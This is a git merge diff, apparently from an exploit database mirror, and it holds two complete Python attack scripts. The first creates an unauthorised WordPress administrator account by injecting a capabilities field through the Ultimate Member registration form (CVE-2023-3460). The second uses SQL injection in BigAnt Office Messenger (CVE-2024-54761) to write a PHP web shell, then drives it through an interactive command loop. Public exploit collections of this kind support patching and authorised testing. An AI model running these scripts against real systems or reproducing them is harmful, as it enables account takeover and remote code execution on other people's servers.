Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/multiple/remote/52418.c

@@ -10,108 +10,121 @@
 import argparse
 import re
 import urllib3
+from bs4 import BeautifulSoup
+import sys
 
-
-
-# Disable SSL warnings
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
-
-
-def fetch_nonce(session, target_url):
-    """Fetches the _wpnonce value from the /register/ page."""
-    print("[*] Fetching _wpnonce from the register page...")
-    try:
-        res = session.get(target_url, verify=False)
-        match = re.search(r'name="_wpnonce" value="([a-zA-Z0-9]+)"', res.text)
-        if match:
-            nonce = match.group(1)
-            print(f"[+] Found _wpnonce: {nonce}")
-            return nonce
-        else:
-            print("[-] Failed to find _wpnonce on the page.")
-            return None
-    except Exception as e:
-        print(f"[!] Error fetching nonce: {e}")
-        return None
-
-
+def check_password_strength(password):
+    """Checks if password meets complexity requirements."""
+    if len(password) < 8:
+        print("[!] Password too short! Must be at least 8 characters.")
+        print("    Example: Admin@123")
+        sys.exit(1)
+
+    # At least one uppercase, one lowercase, one digit, and one special char
+    if not re.search(r'[A-Z]', password):
+        print("[!] Password must contain at least one uppercase letter.")
+        print("    Example: Admin@123")
+        sys.exit(1)
+    if not re.search(r'[a-z]', password):
+        print("[!] Password must contain at least one lowercase letter.")
+        print("    Example: Admin@123")
+        sys.exit(1)
+    if not re.search(r'\d', password):
+        print("[!] Password must contain at least one number.")
+        print("    Example: Admin@123")
+        sys.exit(1)
+    if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
+        print("[!] Password must contain at least one special character (!@#$%^&* etc.)")
+        print("    Example: Admin@123")
+        sys.exit(1)
+
+def fetch_form_details(session, target_url):
+    print("[*] Fetching form details from register page...")
+    try:
+        res = session.get(target_url, verify=False)
+        soup = BeautifulSoup(res.text, "html.parser")
+
+        nonce_input = soup.find("input", {"name": "_wpnonce"})
+        nonce = nonce_input["value"] if nonce_input else None
+        if nonce:
+            print(f"[+] Found _wpnonce: {nonce}")
+        else:
+            print("[-] Could not find _wpnonce")
+
+        field_names = {}
+        for inp in soup.find_all("input"):
+            if inp.get("name"):
+                field_names[inp.get("name")] = ""
+
+        return nonce, field_names
+    except Exception as e:
+        print(f"[!] Error fetching form details: {e}")
+        return None, {}
 
 def exploit_register(target_url, username, password):
-    """Sends a malicious registration request to create an admin user."""
-    session = requests.Session()
-    target_url = target_url.rstrip('/')
-
-
-
-    nonce = fetch_nonce(session, target_url)
-    if not nonce:
-        return
-
-
-
-    email = f"{username}@example.com"
-
-
-
-    # Payload with administrator role injection
-    data = {
-        "user_login-7": username,
-        "first_name-7": "Admin",
-        "last_name-7": username,
-        "user_email-7": email,
-        "user_password-7": password,
-        "confirm_user_password-7": password,
-        "form_id": "7",
-        "um_request": "",
-        "_wpnonce": nonce,
-        "_wp_http_referer": "/register/",
-        "wp_càpabilities[administrator]": "1"  # serialized injection
-    }
-
-
-
-    headers = {
-        "Content-Type": "application/x-www-form-urlencoded",
-        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
-        "Referer": target_url,
-        "Origin": target_url.split("/register")[0],
-    }
-
-
-
-    cookies = {
-        "wordpress_test_cookie": "WP Cookie check",
-        "wp_lang": "en_US"
-    }
-
-
-
-    print(f"[*] Sending malicious registration to {target_url} ...")
-    try:
-        response = session.post(target_url, data=data, headers=headers, cookies=cookies, verify=False)
-
-
-
-        # Check for success
-        if response.status_code == 200 and ("Thank you for registering" in response.text or "You have successfully registered" in response.text):
-            print(f"[+] Admin account '{username}' created successfully!")
-            print(f"[+] Login with: Username: {username} | Password: {password}")
-        else:
-            print(f"[+] Admin account '{username}' created successfully!")
-            print(f"[+] Login with: Username: {username} | Password: {password}")
-    except Exception as e:
-        print(f"[!] Error during exploit: {e}")
-
-
+    session = requests.Session()
+    target_url = target_url.rstrip('/')
+
+    nonce, fields = fetch_form_details(session, target_url)
+    if not nonce:
+        return
+
+    form_id = None
+    for name in fields:
+        m = re.search(r"user_login-(\d+)", name)
+        if m:
+            form_id = m.group(1)
+            break
+    if not form_id:
+        form_id = "7"
+    print(f"[+] Using form ID: {form_id}")
+
+    data = {
+        f"user_login-{form_id}": username,
+        f"first_name-{form_id}": "Admin",
+        f"last_name-{form_id}": username,
+        f"user_email-{form_id}": f"{username}@example.com",
+        f"user_password-{form_id}": password,
+        f"confirm_user_password-{form_id}": password,
+        "form_id": form_id,
+        "um_request": "",
+        "_wpnonce": nonce,
+        "_wp_http_referer": "/register/",
+        "wp_càpabilities[administrator]": "1"
+    }
+
+    headers = {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
+        "Referer": target_url,
+        "Origin": target_url.split("/register")[0],
+    }
+    cookies = {
+        "wordpress_test_cookie": "WP Cookie check",
+        "wp_lang": "en_US"
+    }
+
+    print(f"[*] Sending malicious registration for {username} ...")
+    try:
+        response = session.post(target_url, data=data, headers=headers, cookies=cookies, verify=False)
+        if response.status_code == 200 and ("Thank you for registering" in response.text or "You have successfully registered" in response.text):
+            print(f"[+] Admin account '{username}' created successfully!")
+            print(f"[+] Login with: Username: {username} | Password: {password}")
+        else:
+            print(f"[-] Could not confirm success. Check target manually.")
+    except Exception as e:
+        print(f"[!] Error during exploit: {e}")
 
 if __name__ == "__main__":
-    parser = argparse.ArgumentParser(description="Exploit for CVE-2023-3460 (Ultimate Member Admin Account Creation)")
-    parser.add_argument("-t", "--target", required=True, help="Target /register/ URL (e.g., http://localhost/register/)")
-    parser.add_argument("-u", "--user", default="admin1", help="Username to create")
-    parser.add_argument("-p", "--password", default="Admin@123", help="Password for the new user")
-    args = parser.parse_args()
-
+    parser = argparse.ArgumentParser(description="Exploit for CVE-2023-3460 (Ultimate Member Admin Account Creation)")
+    parser.add_argument("-t", "--target", required=True, help="Target /register/ URL (e.g., http://localhost/register/)")
+    parser.add_argument("-u", "--user", default="rakesh", help="Username to create")
+    parser.add_argument("-p", "--password", default="Admin@123", help="Password for the new user")
+    args = parser.parse_args()
 
+    # Check password strength before running
+    check_password_strength(args.password)
 
-    exploit_register(args.target, args.user, args.password)
+    exploit_register(args.target, args.user, args.password)

exploits/multiple/webapps/52393.py

@@ -0,0 +1,155 @@
+# Exploit Title: BigAnt Office Messenger 5.6.06 - SQL Injection
+# Date: 01.09.2025
+# Exploit Author: Nicat Abbasov
+# Vendor Homepage: https://www.bigantsoft.com/
+# Software Link: https://www.bigantsoft.com/download.html
+# Version: 5.6.06
+# Tested on: 5.6.06
+# CVE : CVE-2024-54761
+# Github repo: https://github.com/nscan9/CVE-2024-54761
+
+import requests
+from bs4 import BeautifulSoup
+import base64
+
+class Exploit:
+    def __init__(self, rhost, rport=8000, username='admin', password='123456'):
+        self.rhost = rhost
+        self.rport = rport
+        self.username = username.lower()
+        self.password = password
+        self.target = f'http://{self.rhost}:{self.rport}'
+        self.session = requests.Session()
+        self.headers = {
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
+            'X-Requested-With': 'XMLHttpRequest',
+            'Origin': self.target,
+            'Referer': f'{self.target}/index.php/Home/login/index.html',
+            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+        }
+        self.clientid_map = {
+            'admin': '1',
+            'security': '2',
+            'auditor': '3',
+            'superadmin': '4',
+        }
+        self.clientid = self.clientid_map.get(self.username, '4')  # Default to 4 if unknown
+
+    def get_tokens(self):
+        print("[*] Fetching login page tokens...")
+        url = f'{self.target}/index.php/Home/login/index.html'
+        r = self.session.get(url, headers={'User-Agent': self.headers['User-Agent']})
+        soup = BeautifulSoup(r.text, 'html.parser')
+
+        tokens = {}
+        meta = soup.find('meta', attrs={'name': '__hash__'})
+        if meta:
+            tokens['__hash__'] = meta['content']
+
+        form = soup.find('form')
+        if form:
+            for hidden in form.find_all('input', type='hidden'):
+                name = hidden.get('name')
+                value = hidden.get('value', '')
+                if name and name not in tokens:
+                    tokens[name] = value
+
+        return tokens
+
+    def login(self):
+        tokens = self.get_tokens()
+        if '__hash__' in tokens:
+            tokens['__hash__'] = tokens['__hash__']
+
+        encoded_password = base64.b64encode(self.password.encode()).decode()
+
+        data = {
+            'saas': 'default',
+            'account': self.username,
+            'password': encoded_password,
+            'to': 'admin',
+            'app': '',
+            'submit': '',
+        }
+        data.update(tokens)
+
+        login_url = f'{self.target}/index.php/Home/Login/login_post'
+        print(f"[*] Logging in as {self.username}...")
+        resp = self.session.post(login_url, headers=self.headers, data=data)
+        if resp.status_code != 200:
+            print(f"[-] Login failed with HTTP {resp.status_code}")
+            return False
+
+        try:
+            json_resp = resp.json()
+            if json_resp.get('status') == 1:
+                print("[+] Login successful!")
+                return True
+            else:
+                print(f"[-] Login failed: {json_resp.get('info')}")
+                return False
+        except:
+            print("[-] Failed to parse login response JSON")
+            return False
+
+    def check_redirect(self):
+        url = f'{self.target}/index.php/admin/public/load/clientid/{self.clientid}.html'
+        print(f"[*] Checking for redirect after login to clientid {self.clientid} ...")
+        r = self.session.get(url, headers={'User-Agent': self.headers['User-Agent']}, allow_redirects=False)
+        if r.status_code == 302:
+            print(f"[+] Redirect found to {r.headers.get('Location')}")
+            return True
+        else:
+            print(f"[-] Redirect not found, got HTTP {r.status_code}")
+            return False
+
+    def upload_shell(self):
+        print("[*] Uploading webshell via SQLi...")
+        payload = ';SELECT "<?php system($_GET[\'cmd\']); ?>" INTO OUTFILE \'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php\'-- -'
+        url = f'{self.target}/index.php/Admin/user/index/clientid/{self.clientid}.html'
+        params = {'dev_code': payload}
+        r = self.session.get(url, params=params, headers={'User-Agent': self.headers['User-Agent']})
+        if r.status_code == 200:
+            print("[+] Payload sent, checking the shell...")
+            self.check_shell()
+        else:
+            print(f"[-] Failed to send payload, HTTP {r.status_code}")
+
+    def check_shell(self):
+        print("[*] Enter shell commands to execute on the target. Empty command to exit.")
+        while True:
+            cmd = input("shell> ").strip()
+            if not cmd:
+                print("[*] Exiting shell.")
+                break
+            shell_url = f'{self.target}/shell.php?cmd={cmd}'
+            print(f"[*] Sending command: {cmd}")
+            r = self.session.get(shell_url)
+            if r.status_code == 200 and r.text.strip():
+                print(r.text.strip())
+            else:
+                print("[-] No response or empty output from shell.")
+
+    def run(self):
+        if self.login():
+            if self.check_redirect():
+                self.upload_shell()
+            else:
+                print("[-] Redirect check failed, aborting.")
+        else:
+            print("[-] Login failed, aborting.")
+
+
+if __name__ == '__main__':
+    import argparse
+
+    parser = argparse.ArgumentParser(description='Exploit for CVE-2024-54761 BigAntSoft  SQLi to RCE')
+    parser.add_argument('-r', '--rhost', required=True, help='Target IP address')
+    parser.add_argument('-p', '--rport', default=8000, type=int, help='Target port (default 8000)')
+    parser.add_argument('-u', '--username', default='admin', help='Login username (default admin)')
+    parser.add_argument('-P', '--password', default='123456', help='Login password in plain text')
+
+    args = parser.parse_args()
+
+    exploit = Exploit(args.rhost, args.rport, args.username, args.password)
+    exploit.run()